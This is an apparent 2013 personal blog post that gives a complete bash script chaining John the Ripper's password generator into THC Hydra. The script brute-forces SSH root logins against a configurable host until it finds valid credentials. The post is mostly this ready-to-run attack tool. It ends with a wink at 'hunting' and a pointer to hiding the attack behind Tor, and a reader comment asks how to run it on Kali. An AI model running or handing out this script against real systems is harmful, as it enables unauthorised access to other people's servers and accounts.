Friday, June 21, 2013

I hate downloading WordLists



1. Introduction

You most definetly know of THC Hydra ... well i love the tool problem is ...Hydra don’t digest huge lists of passwords. The reason is that Hydra will first try to load your password file into memory (RAM) before start the brute-force attack. And so, you are limited by your memory size plus i hate downloading the darn wordlists or dictionaries well why... takes to much time changes every now and then... and my internet speed sometimes sucks and the bundles lord the bundles.....so here is my tune up.... why dont we use two tools

HYDRA and John The Ripper

It’s OK with an usual password dictionary, but you could want more. Something like passwords list generated by “John the ripper” (John provides greats way to generate passwords: digit/alpha/special chars only, “rules” options, “external” filters, etc.)

Our goal is to use the output of John the ripper with Hydra.

The method is trivial but does the job.

loop

(1) Generate random passwords with John the Ripper in a file durring few seconds (file grow up very quickly).

Keep a john's session file.

(2) Run hydra with the passwords file.

(3) If found, exit. if not, continue the session created in (1).

end loop



2. The script

This is the bash script I wrote to perform the task.

· Review ‘hydra_*‘ variables (if need run ‘hydra –help’). See: ‘hydra_host‘, ‘hydra_port‘, ‘hydra_module‘, … and maybe ‘hydra_all_params‘.

· Review ‘john_*‘ variables. See: ‘john_all_params‘ and choose your template : (–incremental:All, –incremental:Digits , –incremental:Alpha , –single, –rules …) see john.conf file to get the list.

Enjoy!

Get hydra-john.sh

#!/bin/sh

hydra="/usr/local/bin/hydra"

john="/usr/bin/john"

hydra_module="ssh2"

hydra_host="127.0.0.1"

hydra_port="22"

hydra_nb_task="10"

hydra_all_params="-f -s $hydra_port -t $hydra_nb_task -e ns "

john_sessionfile="$1"

john_all_params="--incremental:Alpha --stdout"

john_time_step=20 # time (seconds) to run john

tmp_passwd="/tmp/pwd1234.tmp"

hydra_logfile="/tmp/hydralog"



if [ "$1" = "" ];then

echo "Usage: $0 <john session file>"

exit 0

fi



#for lfile in `ls $loginfiles*`;do



while [ 1 ];do

# generate some password with john the ripper

echo; echo "- Start (re)generating passwords with John"

if [ -e "$john_sessionfile.rec" ];then

# if session exist, restore it

$john --restore=$john_sessionfile > $tmp_passwd &

else

# if session not exist yet, create it

$john $john_all_params --session=$john_sessionfile > $tmp_passwd &

fi



# wait 100 seconds, then kill john and start hydra on it

echo "- Wait ..."

sleep $john_time_step

echo "- Kill john"

killall john 2>/dev/null 1>/dev/null

sleep 1



# start hydra

echo; echo "- Start hydra"; echo



rm -f $hydra_logfile

echo "$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile"

$hydra -l root -P $tmp_passwd $hydra_all_params $hydra_host $hydra_module | tee -a $hydra_logfile



# if a valid pair has been found, stop the loop

if [ "`grep $hydra_module $hydra_logfile | grep -v DATA`" != "" ];then

echo; echo "FOUND !!"

grep $hydra_module $hydra_logfile | grep -v DATA

exit 0

fi



done



happy hunting ... oops learning .... p.s to check out this trick with a proxy(tor) check this site...am here fuu








1 comment:

hans abachraev said...

how i can do it in kali linux

Post a Comment

Dynamic Binary Instrumentation (pt2)

Quick how to: After install of Frida on your machine, you will need to install your server agent on your (use case is phone) iphone/andro...